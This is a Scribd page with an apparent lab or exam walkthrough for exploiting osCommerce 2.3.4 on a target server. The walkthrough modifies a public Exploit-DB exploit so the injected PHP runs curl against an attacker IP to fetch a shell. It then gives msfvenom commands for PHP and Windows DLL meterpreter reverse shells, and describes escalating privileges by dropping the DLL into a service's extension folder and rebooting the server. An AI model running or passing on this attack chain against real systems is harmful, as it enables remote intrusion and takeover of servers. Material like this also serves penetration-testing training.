Scribd Logo
Upload

Welcome to Scribd!

  • 80 OSCommerce

    Uploaded by

    qzombexzombe114
    12 views1 page
    The document provides instructions for exploiting an osCommerce vulnerability on a server running version 2.3.4 using an exploit from Exploit-DB. It describes changing the PHP payload to download a meterpreter reverse TCP shell, generating that payload with msfvenom, and placing it on the server. It also details escalating privileges by placing a meterpreter DLL payload in a custom service directory that loads any DLL, then restarting the server to trigger the payload.

    Original Description:

    Original Title

    80-OSCommerce

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    The document provides instructions for exploiting an osCommerce vulnerability on a server running version 2.3.4 using an exploit from Exploit-DB. It describes changing the PHP payload to download a meterpreter reverse TCP shell, generating that payload with msfvenom, and placing it on the server. It also details escalating privileges by placing a meterpreter DLL payload in a custom service directory that loads any DLL, then restarting the server to trigger the payload.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    12 views1 page

    80 OSCommerce

    Uploaded by

    qzombexzombe114
    The document provides instructions for exploiting an osCommerce vulnerability on a server running version 2.3.4 using an exploit from Exploit-DB. It describes changing the PHP payload to download a meterpreter reverse TCP shell, generating that payload with msfvenom, and placing it on the server. It also details escalating privileges by placing a meterpreter DLL payload in a custom service directory that loads any DLL, then restarting the server to trigger the payload.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 1

    You find on Port 8811 osCommerce running on the server withversion 2.3.

    4
    You can use this exploit https://www.exploit-db.com/exploits/44374

    Change this part


    payload = '\');'
    payload += 'system("ls");' # this is where you enter you PHP payload
    payload += '/*'

    TO

    payload = '\');'payload += 'exec("curl http:/IP:8080/shell22.php -o shell22.php");'


    payload += '/*'

    msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=22 -f raw >


    /root/Desktop/exploits/shell22.php
    THE PAYLAOD SHOULD BE A METERPRETER PAYLOAD OR THE SHELL WILL DIE ALL TIME !

    PrivEsc

    You find under C:\Program Files\CustomService a Serive.


    The Service lods ANY dll from C:\Program Files\CustomService\Ext
    Create a MFVENOM a ddl payload

    msfvenom -p Windows/meterpreter/reverse_tcp LHOST=IP LPORT=22 -f dll >


    /root/Desktop/exploits/shell.dll

    Place the DLL in the C:\Program Files\CustomService\Ext folder


    You can not restart the service but you can restart the server itself.
    Start a Listner and use shutdown /r to restart the server.

    You might also like